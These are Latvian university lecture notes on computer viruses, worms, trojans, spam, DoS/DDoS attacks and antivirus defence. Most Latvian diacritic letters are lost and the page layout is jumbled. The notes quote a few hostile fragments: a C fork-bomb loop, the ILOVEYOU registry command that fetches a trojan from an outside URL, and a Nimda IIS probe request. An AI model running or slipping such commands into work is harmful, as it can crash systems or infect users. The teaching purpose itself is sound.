Datu droba un aizsardzba

12.lekcija

Vrusi, to paveidi. Trojni. Klasifikcija. Attlintie uzbrukumi (DoS, satura maia, satura iegana). E-pasta riski , spams. Pretvrusu aizsardzba.
Pirm st datorvrusu ptniecba aizsks 1983. gad, kad Freds Koens (Fred Cohen) savas doktora disertcijas ietvaros, eksperimentja ar datoru drobu, un pirmo reizi pielietoja terminu vruss, lai apraksttu pakopjoos programmu. obrd ir zinmi vairk nek 60 tkstoi vrusu. Zaudjumi, kdus sagd vrusveidotji attstto valstu ekonomikai sastda vairkus miljardus dollaru.

1. VRUSI
Vruss koda fragments, kur veic pareplikciju, k ar var veikt kdu darbbu (par kuru nav informts datora lietotjs). Vruss koda fragments, kur sevi ievieto izpildm vid (host) (tai skait OS) ar mri sevi izplatt. is koda fragments nevar sevi izpildt (darboties) autonomi. Tam ir nepiecieama izpildm vide (hosta programmatra), kura aktiviz vrusa darbu. Skotnjais vrusu izplatbas laiks ir saistts pamat ar fizisko nesju (disketes, CD-ROM, Internets k failu prvietoanas vide) pielietojumu. Vrusi pamat izplatjs ar o nesju paldzbu. 1.1. Tarps Trps (worm) trps ir programma , kura var darboties patstvgi, patr hosta resursus un var izplatt sevi piln darbaspjg versij uz citm tkl iesaisttm darbastacijm (hostiem). Tkla programmas - trpi divu programmu savstarpjai izplatanai izmanto tkla savienojumus. Atsevia datora darbbas laik tkla trps var uzvesties k datora vruss vai baktrija, vai pat uzvesties k Trojas zirgs, vai izpildt kdus citas kaitnieciskas opercijas. Tkla trpu pavairoanai izmanto kdas no tkl piedvtajm informcijas saemanas iespjm. K piemri var bt sekojoi dienesti. Elektroniskais pasts. Trpi nosta savu kopiju pa pastu uz citu sistmu. Attlints programmas izsaukums. Trpi palai savu kopiju izpildei cit sistm. Pieeja attlintais sistmai. Trpi ieiet attlint sistm k lietotjs, bet pc tam izmanto sevis kopanas komandu no vienas sistmas otr. Jauns programmas kopija- trpi rezultt izrds palaista attlint sistm, kur papildus vism citm trpu opercijm tie turpina vl pavairoties. 1 (13)

Datu droba un aizsardzba izplatans un izpildans fze. Izplatans fz parasti izpilds sekojoas funkcijas. 1.

12.lekcija

Tkla trps daudzjd zi ir ldzgs datorvrusam: tam ar ir inkubcijas periods, Citu sistmu meklana, kuras vartu infict, prbaudot dotajam datoram zinmos sarakstus ar mezgliem vai citiem ldzgiem objektiem, kur glabjas informcija ar attlinto sistmu adresm. 2. 3. Uzstdana, savienoana. Sava koda kopana attlintajai programmai.

Pirms kopt sevi cit programm, tkla trps tik pat labi var mint noskaidrot vai sistma nav bijusi jau inficta agrk. Tas var ar slpt savu kltbtni pieirot sev nosaukumu, attiecgu sistmas procesam, vai izmantojot kaut kdu citu vrdu, kas neradtu aizdomas sistmas operatoram. Trpi savai izplatanai parasti izmanto vides (kurm tie ir rakstti piem. OS) drobas trkumus- caurumus. Tpat k vrusiem, tkla trpiem ir grti pretoties. Bet tkla aizsardzba un atsevia datora drobas paskumi pie pareizas konfigurcijas mazina trpu iespjami radtos draudus. 1.2. Makrovrusi Makrovrusi vruss, kura darbbu nodroina (interpret ) hosta programmatra. Makrovrusi infic MS paketes lietojumprogrammu, tdu k MS Word, Escel dokumentus. Makrovrusu eksistence ir izveidota uz makrosu uzturanas ldzeku izmantoanas, kuri tiek piedvti MS Word- un citas ofisa lietojumprogramms (piemra, MS Escel). Pc btbas makross ir programma, kas ir iebvta teksta procesora dokumenta vai kaut kda cita tipa fail. Parasti lietotji izmanto makrosus tam d, lai automatiztu biei izpildmo darbbu izpildi, kas auj ieekonomt laiku. Makrosu valoda visbiek ir kds Basic programmanas valodas variants. Lietotjs var ierakstt taustiu nospieanas secbu makrosa veid, bet pc tam noregult programmu t, lai ieraksttais makross tiktu izsaukts ar funkcionla taustia nospieanu vai ar ar specilu taustiu kombinciju. Makrosu izveidoana kst iespjama, pateicoties automtisko makrosu eksistencei. ie makrosi, kas izpilds automtiski, bez to atklts aktivizcijas no lietotja puses. Tipiskie automtiski notiekoie notikumi ir faila atvrana vai aizvrana, k ar lietojumu palaiana. Savas izpildes laik makros var kopt pats sevi cit dokument, dzst failus un izpildt ar jebkdas citas darbbas, kas izncina lietotja sistmu. MS Word- eksist trs automtisko makrosu tipi: AutoExec. Makross, kas nosaukts k rezervtais vrds AutoExec, atrodas norml.dot ablon vai ar globlaj ablon, kas glabjas Word palaianas katalog (startup directory), un automtiski izpilds Word palaianas brd.

2 (13)

Datu droba un aizsardzba

12.lekcija

Automakros. Tie izpildts, kad notiek noteikts notikums, piemram, dokumenta atvranas vai aizvranas notikums, jauna dokumenta izveides vai Word darba pabeiganas notikums.

Komandrindas makros. Ja makrosam, kur atrodas makrosu globlaj fail vai ir saistts ar tekoo dokumentu, ir vrds, kas sakrt ar Word komandas nosaukumu, tad ts izpildsies katr s komandas izsaukanas reiz.

Kaut ar makrovrusi ir raduies MS Office (Word, Excel u.c.) darba automatizcijas rku attstbas gait. Var rasties doma, ka vispirms ir jatver interpretjoais rks (Word, Excel), lai is vruss sktu darbu. Tomr t tas nav, jo VBA (visual basic for application) ir integrts vis Office paket. Piemrs vruss Melissa izplats ar e-pastu, kas satur VBA makrokodu, kuru izpilda MS Outlook, is vruss nosta sevi pirmajiem 50 adrestiem, kurus atrod aj hosta Outluka pasta sarakst (address book). 1.3. Trojas zirgi Trojas zirgi (trojni) izpildms kods, par kuru tiek gaidts, ka tie veiks kdu darbbu, bet tai pa laik ie kodi var veikt virkni nesankciontu darbbu. Trojas zirgi ir noderga vai izliekas par nodergu programmu vai komandas procedru, kas satur slepeno kodu, kur pc programmas palaianas izpilda nevlamas vai graujoas funkcijas. das tipa programmas var kalpot pastiprintai operciju izpildei, kuras nesankcionts lietotjs tiei nevar izpildt. Piemram, lai saemtu pieeju cita lietotja failiem uz datora, kur atrodas vairku cilvku lietoan, aundaris var radt programmu Trojas zirgs, kura pie ieejas izmains pieejas parametru kontroli attiecg lietotja failiem, padarot os failus visiem atvrtus. Radot du programmu, autors var izprovoct citus lietotjus to palaist, ieliekot to koplietoanas katalog un pieirt tai nosaukumu, kas vairumam lietotju liksies k noderga programma vai utilta. Par piemru var kalpot programma, kas it k rada lietotju failu sarakstu vajadzgaj formt. Pc tam, kad lietotjs palai programmu, programmas autors var iegt piekuvi informcijai, kuru satur lietotja faili. Piemram, Trojas zirgs, kuru ir oti grti atklt, izrds ir kompilators, modificts ar mri ieviest papildus noteikta veida kompiljamo programmu kodus, piemram, programmas sistmas ieej. is kods ir k reistrcijas modua caurums, kur auj programmas autoram ieiet sistm ar specilas paroles paldzbu. Vl viena motivcija uzrakstt Trojas zirgu ir datu sagrve. d gadjum programma, kura izpilda kaut kdas nodergas funkcijas (piemram, programma-kalkulators), var bez kaut kdas iekjas pardans izncint lietotja failus.

3 (13)

Datu droba un aizsardzba 1.4. Viltus vrusi

12.lekcija

Viltus vrusi hoaxes Internet klstoas vstules ar informciju par vrusiem , kuri stenb nav vrusi. das vstules parasti izraisa des reakciju un paas par sevi var tikt pieskaittas vrusu grupm. 1.5. Spams Spams ir surogtpasts, mstule. Tas ir elektroniskais liekpasts vai nevlama un uzbzga interekopu apzioana, kas ne tikai tr klientu laiku, spieot tos last nevajadzgu e-pastu, bet ar aizem lielu tkla joslas platumu. Viena un t paa ziojuma kopijas nostana vairkm tkla Internet lietotju interekopm, kuras ts nav pieprasjuas un kuru tematikai neatbilst ziojumu saturs. Lai kontroltu spam stanu, LR likumdoan ar 2004. gada 1. decembri ir stjies spk "Informcijas sabierbas pakalpojumu likums, kur iekauts jdziens komercils paziojums. Tas ir jebkds paziojums elektronisk veid, kas paredzts tieai vai netieai preu vai pakalpojumu reklamanai vai ar tda komersanta, organizcijas vai personas tla reklamanai, kas veic komercdarbbu, saimniecisku darbbu vai reglamentto profesionlo darbbu. Turklt likuma 9.pants nosaka komercila paziojuma stanas aizliegumu: Tda komercila paziojuma stana pa elektronisko pastu, kura saemanai persona nav devusi iepriekju piekrianu, k ar jebkuru citu personai traucjou paziojumu stana ir aizliegta.

2. VRUSU KLASIFIKCIJA
Virusus var klasifict divs kategorijs: pc piegdes mehnisma; pc izturans.

2.1. Izplatans cei (piegdes mehnismi) Vruss parazts Tradicionla un ldz im pati izplttk vrusa forma. Vruss parazts pieliek klt izpildmiem failiem savu kodu un izplats izinfictas programmas katras palaianas gadjum, mekljot citus failus, kurus iespjams infict. Klasiski piemri pievienojot sevi *.COM un *.EXE tipa failiem MS-DOS vid. odien di nesjfaili var bt jebkuri izpildmi vai interpretjami faili , piem. normal.dot makrovrusiem tipa vrusi var uzskt darbbu gadjum, ja nesjfailam ir nodota vadba piem. startjot OS ieldes gait.

4 (13)

Datu droba un aizsardzba Ieldes (boot sektora) vrusi

12.lekcija

Infic galveno ieldamo ierakstu vai ieldamo sektoru un izplats, kad sistma tiek ieldta no inficta diska. ie vrusi iekop sevi ciet diska vai disketes ieldes sektor : Iesldzot datoru (OC), parasti notiek: o o o o o o notiek POST (Power on self test) procesi: Notiek iekrtu prbaude (vai ir klaviatra, utt) Notiek resursu prbaude (operatv atmia) Darbu uzsk BIOS procesi : noskaidro iekrtu, no kurienes ieldsimies) Tiek ieldti draiveri pieejai pie ieldes iekrtm Uz ieldes iekrtas tiek atrasts ieldes (boot) sektors Tiek ieldts BOOT sektor esoais kods un tam tiek nodota vadba Ieldes programma ield OS (MS DOS vai Windows , vai Linux etc)

Piemram: Ja ielde notiek no ciet diska, tad tiek meklts (master boot ieraksts) MBR uz pirm diska pirm cilindra pirmaj sektor. aj ierakst ir norde uz ciet diska sadau (partciju) tabulu, kur tiek meklta sadaa ar atzmi (ieldjama (active)), pc tam vadba tiek nodota uz s sadaas skumu. eit ir jatrodas boot sektoram Ieldes vrusa gadjum: vruss vadbu var nodot MBR (var atrasties aj pozcij) vai vruss var atrasties diska sadaas boot ierakst. eksistjoo MBR vai ieldes sektoru prraksta kaut kur citur; ievieto referenci uz sevi vai savu kodu vec MBR vai BOOT sektora viet; sava koda beigs ievieto vadbas prnesi (JMP) uz sto MBR vai boot sektoru. Parasti ieldes vrusi

Problma ie vrusi darbu uzsk, PIRMS OS uzsk darbu un ldz ar to vrusi var KONTROLT pretvrusu programmu darbbu. Slptais (steatlh) vruss Gadjum, ja ds ieldes vruss OS ieldes gait modific ieldjams OS kodu, piemram, prkrto prtraukumu tabulas, tad Piemram, ja pretvrusu programma grib noskaidrot, vai boot sektors vai MBR nav inficts un attiecgi ar prtraukumu pieprasa attiecg sektora lasanu, tad ds pieprasjums var 5 (13)

Datu droba un aizsardzba du vrusu konstatt nevars. dus vrusus sauc par slptajiem (steatlh) vrusiem. Polimorfais vruss

12.lekcija

tikt PRADRESTS uz sektoru, kur stenb atrodas oriinlais kods. Ldz ar to ds antivruss

Pretvrusu programmu viena no kopgajm iezmm tiek caurskatts operatvs atmias saturs, tad tiek caurskatta failu sistma un to saturs tiek saldzints ar noteiktu ablonu (signatru) kopu (taj atrodas iespjam vrusa tipisks koda fragments). Vruss var mint sevi maskt t, lai signatru fail ds vrusa koda fragments nebtu. Piemram: vruss sav koda skum satur DES atslgu tlt aiz t seko ifrcijas /deifrcijas kods uzsakot darbu, vruss sevi ar o atslgu DEIFR, iegstot inficto kodu pc kaitgo darbbu veikanas (piem . izplatanas) tiek enerta jauna DES atslga, ar kuru vrusa kods tiek noifrts. Ldz ar to dados laika momentos viena un t paa vrusa kods izskatsies dadi, izemot ifrcijas/dekriptcijas kodu. Bet ar pats ifrcijas/dekripcijas kods var bt maings. Piemram: programmas mankods var bt lieks saturt liekas komandas, starp kurm st vadba tiek nodota ar JMP komandu paldzbu. Savukrt kuru konkrti JMP no vairkm izvlties, katr izpildes gait ar random metodi tiek prenerts ldz ar to iegstot neprognozjamu izpildes kodu. ifrciju/deifrciju var veikt standarta OS bibliotku izsaukumi (Windows prtraukumi) Vrusus, kuru izpildmo kodu maina pats vruss, sauc par polimorfiem vrusiem. 2.2. Vrusu izturans (darbba) Vrusi pc izturanas var bt nosacti: o o nekaitgi (piem. tie tikai izplata sevi); piesrojoi (piem. atstj dator programmas kodu fragmentus, tai skait cookies); kaitgi tiei (boj datus, sadau tabulas u.c.); netiei (vc informciju par lietotju un to nosta vrusa autoram spyware).

Ir ar vrusi, kuri savu darbbu uzsk pie noteiktu nosacjumu iestans (piektdiena, 13). Vrusi maksimli izplatsies, ja tie bs cross-platformu orientti: JAVA vrusi; 6 (13)

Datu droba un aizsardzba Macrovrusi;

12.lekcija

Rekompiltie (parasti katra UNIX vide satur C kompilatoru, t.i. tiek izplatts vrusa kods, kur tiek kompilts uz salinkots uz hosta manas; Grafisko apletu vrusi (Shochwave Flash SWF/LFM -926 vruss).

2.3. Vrusu izplatans iemesli Galvenie virusu izplatanas iemesli ir: Trkumi (caurumi) OS piemram buffer overflow Psiholoiska ietekme.

Piemram: Virusi Melissa un I love you. Tiek izmantota infict datora e-pata adresu grmata. Taj tiek atrasta nko upura adrese. T k e-pasta samjs lauk From redz sev ziamu adresi (sttju) , vi uzticas im e-pastam un atver to ,tdjdi aktivizjot vrusu. Melissa aizvieto Document_Open() makrosu Worda fail, ldz ar to is makros nostrd, atverot e-pasta pielikum nkoo word failu. des vrusi. Vruss var modifict Inerneta prlkprogrammu t, lai t atvrtos uz noteiktu lapaspusi, kura savukrt ielad nkoo saistto programmu. Piemram, I love you makros satur komandu: Regcreate HKCU\Software\Microsoft\Internet Explorer\Main\Start page, http://www.skynet.net/.........../win-bugsfix.exe ,kur win-bugsfix.exe ir Trojna tipa programma.

3. MSDIENU VRUSI
Msdiens vrusi ir oti kompleksi un ldz ar to tie oti tri un efektvi izplats. Piemram, Nimda worm (2001 septembris): izplats k modificts EXE fails ar e-pasta vstulm; var izplatties, k audio/x-wave MIME tipa fails, kur , balstoties uz IE trkumu (2001 gad), WWW lap saskaroties ar o failu, veic nekavjou faila izpildi (piemram, ja is fails tiek skatts k e-pasta pielikums publisk pasta server); vruss noskaidro personas, kuru e-pasta adreses ir atrodamas infict datora adresu grmat, k ar adreses, kuras atrod WWW prlkprogrammas vstures cache (t.i. kuras nesen ir skattas ar IE) un ar sev iebvtu SMTP engine nosta infictas vstules uz m adresm;

7 (13)

Datu droba un aizsardzba pret katru URL 9no history) veic virkni pieprasjumu

12.lekcija (piem. GET

vruss caurskata www adreses, kuras ir apmekltas no inficts manas, un attiecb /scripts/root.exe?/c+dir utt), mekljot iespjamu drobas caurumu; atrodot neaizsargtu IIS serveri, vruss mina ar tftp komandu (nostt savu kodu uz o datoru. Vienlaikus tiek izveidots Guest konts ar Administratora tiesbm, k ar tiek izveidota windows (NETBEUI) C diska shre (k C$);

visi loklie HTML un ASP faili tiek modificti, lai iekautu taj Javascript kodu, kas savukrt nodrointu, ka jebkur, kur mins caurskatt ar IE os failus, automtiski infictos;

Vruss iekpp sevi .EML un .NWS failos dads lokl datora un lokl tkla direktorijs respektvi , ja IE tiek lietots, lai caurskattu loklos resursus, tad auto`matiski is dators tie kinficts;

Vruss iekop sevi fail riched.dll, tdjdi atverot jebkuru MS Office dokumentu , darbu uzsk trojnprogramma.

ds komplekss uzbrukums nodroina to, ka pat tad, ja loklais dators tiek dezinficts, tad nekavjoties tas no lokl tkla iegst jaunu vrusu! Piezme odienas vrusi biei vien veic ar sekojoas maskjoas darbbas: Tiek inficts rika dators; Vruss rika dator atrod Boba e-pasta adresi, uz kuru nosta sevi, vienlaikus e-pasta lauk From k nosttju nordot Alises e-pasta adresi (kuru savukrt is vruss ir atradis vai nu rika dator, vai ar ir atradis rika vai citu jau iepriek infictu datoru atmi); Boba dators ir aizsargts ar pretvrusu programmu, kura inform Bobu, ka Alise grib viu infict. Biei vien pretvrusu programma automtiski sta From adrestam (Alisei) e-pastu ar ziu, ka Alise ir inficta; Alise saem e-pastu no Boba, kuru pat nepazst ar ziu , ka Alises dators ir inficts. Tikai aj brd tiek konstatts, ka kaut kur tkl eksist inficts dators (riks). o datoru atrast ir praktiski neiespjami.

4. ATTLINTIE UZBRUKUMI
Dos ir uzbrukums, kura mris ir pieprast/likt patrt neplnotus resursus, k rezultt uzbrukuma mrim var tik apgrtinta normla darbba. Piemri: Loklie uzbrukumi 8 (13)

Datu droba un aizsardzba o o o o o os resursus patr) sistma paliek oti lna Procesu prslodze (fork bomb) sistma uzkaras (main() { for (;;) fork () ; } ) Resursu izsmelana (piem . brvs disku telpas Tkla uzbrukumi Orientti uz konkrtu produktu Javascript bomb scripts, kas rada neprtrauktu pop-up logu virkni Orientti uz konkrtu tkla resursu

12.lekcija

Procesu degradcija (piem. piem. CPU jaudas nepietiekamba, radot procesus, kas

Piemram,: CISCO rteros tiek lietota CBOS (cisco broadband operating system) , caur kuru tie www rem attlinti tiek konfigurti.Code Red worm vruss mekl Internet IIS , kurus tas vartu infict. aj meklan piedals visi infictie serveri t.i . tiek radta neprtraukta TCP 80 porta konekciju pieprasjumu virkne, kura noblo CBOS, t.i. pc vrusa atklanas tkla darba spja sir atjaunojama s, tikai veicot manulu CISCO rteru prldi.

Orientti uz sistmu k tdu Mris apturt sistmas darbbu Ping of Death 90-o gadu beigs SYN flooding konekcijas izveides pieprasjumi tiek saemti trk, nek sistma spj

Piemri:

atbildt uz tiem. s konekcijas nk SYN paket, kur Sender IP adrese ir imitta (fake), k rezultt sistmai uzskot handshake procesu un nostot SYN- ACK , atbildes apstiprinjums netiek saemts (tas tiek prasts no sistmas, kura SYN nav stjusi , vai vispr neeksist tkl) Savukrt atbilde uz SYN-ACK tiek gaidta noteiktu laiku , k rezultt neprtraukti aug izstto SYN-ACK tabula (saemot jaunus SYN requestus) un drz sistma savu darbu prtrauc (ir izsmelti resursi). DDoS distributed DoS uzbrukumi uzbrukumi, kuros vienam mrim uzbrk virkne datoru: Daemons (zombies) datori, kuros ir iesdinti Trojni (client), kuri klauss tklu, vai viiem nenk kdas komandas (piem : uzbrukt datoram ar IP adresi x.x.x.x ); Master dators, kur organiz o o uzbrukumu.

9 (13)

Datu droba un aizsardzba

12.lekcija

5. PRETVRUSU AIZSARDZBA
Pretvrusu aizsardzbai jbt kompleksam paskumam, kuram jiekauj gan preventvos netieos paskumus, gan tieos paskumus. o o o o o o Preventvie netieie paskumi: OS, prlkprogrammas un darba vides neprtraukts update Iekj tkla resursu nerana Lietotju kontu (ar administratora statusu) esambas kontrole Minimlas lietotju tiesbas (admins ir tikai viens!) Tieie paskumi. Pretvrusu programmatra: Darba viet Interneta un e-pasta gateway

Piezme vlams pielietot dadu raotju pretvrusu programmas. 5.1. Antivrusu programmu veidi Saldzinoie vrusu skaneri izpildmais vai prbaudmais kods tiek saldzints ar iespjamo vrusa signatru (vienkra bet nedroa metode aizsardzba pret vrusu ir iespjama tikai tad, kad programmas uzturtjs ir: o o o o Samis info par vrusa eksistenci Veicis vrusa analzi un ir radjis t atpazanas kritriju kopu (iegta signatra) Signatra ir izplatta visiem pretvrusa programmas lietotjiem T ir aktivizta (ldz ar to parasti dai programmai cnoties ar jau ielaistu vrusu, cna ne vienmr ir veiksmga) Par veiksmgu tiek uzskatta situcija, kur vruss tiek atklts un likvidts, NEBOJJOT inficts programmas darbbu. Secinjums vrusi izplats oti tri, tai pa laik signatras tiek iegtas relatvi vlu, ldz ar to maksimli iespjami biei (piem , reizi dien, vai pie katras datora ieldes prliecinieties , vai nav izlaista jauna signatra un aktivizjiet to. Kontroljoie filtri visiem uz datora esoajiem un atautajiem riskantajiem failiem tiek aprinta kontrolsumma un noglabta aizsargt tabul. Grieoties pie faila, pirms t atvranas kontrolsumma tiek aprinta un saldzinta ar tabulas vrbu. Piezme metode vieng garant aizsardzbu pret vl NEZINMIEM vrusiem. Trkums metode ir pielietojama tikai oti ierobeot programmu kop , nepieaujot nekdas ts izmaias (piem. vienkri aizliedzot strdt ar Internetu!). 10 (13)

Datu droba un aizsardzba

12.lekcija

Imitjos vides aktivizjot kdu programmu, vispirms t tiek aktivizta virtul vid (virtul man - VMS) un tiek prbaudts, vai nepards kdas vrusam raksturgas darbbas. Tikai pc drouma atzanas programmas darbbas rezultti caur interfeisiem tiek nodoti relajai OS (oti reti izmantota metode komplicta).

Problma pret vrusiem ir jcns ne tikai uz drobas perimetra, bet kompleksi iekj tkl!!! 5.2. Antivrusu programmas Pardoties vrusiem, cilvki ar skui izdomt iespjas k ar tiem cnties. obrd eksist vairkas antivrusu programmas, kas auj kontrolt vrusu iekuvi dator un to izncinanu, ja gadjum, tie tomer nokst taj. Nkoaj sarakst ir uzskaitta daa antivrusu programmu un internet adreses, kurs iespjams atrast un izlast to aprakstu un raksturojumus: 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Kasperska antivrusu programmas www.litek.ru/products/avkav.html Symantec www.litek.ru/products/symantec.html Doctor Web www.litek.ru/products/ avdrweb.html Adinf www.litek.ru/products/avadinf.html Dr Solomon's AntiVirus Toolkit - http://www.drsolomon.com/ F-Prot Professional - http://www.commandcom.com/ IBM AntiVirus v. 2.5 - http://www.av.ibm.com/ McAfee VirusScan for Windows 95 - http://www.mcafee.com/ Norton AntiVirus 2.0 for Windows 95 - http://www.symantec.com/ ThunderByte AntiVirus Utilities - http://www.thunderbyte.com/ 5.3. Informcija, kura jiekauj uzmuma drobas politik Uzmuma drobas politik ir jbt noteiktam: Kda pretvrusu programmatra ir jlieto? K un cik biei ir jveic signatru lejupielde? Kdas lietotja tiesbas ir pieaujamas (administratora statuss)? Kdi ir lokl tkla iekjo resursu atauts)? Kdi ir interneta lietoanas nosacjumi (noklustie IE uzstdjumi, vai ir atauta failu lejupielde, vai ar atauta izpildmu failu nostana re-past)? Vai ir atauta diskeu un CD-ROM lietoana? publiskie ranas noteikumi (atauts/nav

11 (13)

Datu droba un aizsardzba no uzticamiem URL)? Kda ir lietotju rcba, konstatjot vrusa darbbas pazmes?

12.lekcija

Vai ir atslgtas Active-X un Javascript iespjas (aizliedzot ts vispr, vai ataujot tikai

12 (13)

Datu droba un aizsardzba Literatra 1. 2. 3. 4. 5.

12.lekcija

.. 2- . , . -. , 2001 http://staff.washington.edu/dittrich/misc/ddos/ (04.09.2006) http://en.wikipedia.org/wiki/Virus (04.09.2006) http://vil.nai.com/vil/default.asp (04.09.2006) http://securityresponse.symantec.com/avcenter/vinfodb.html (05.09.2006)

13 (13)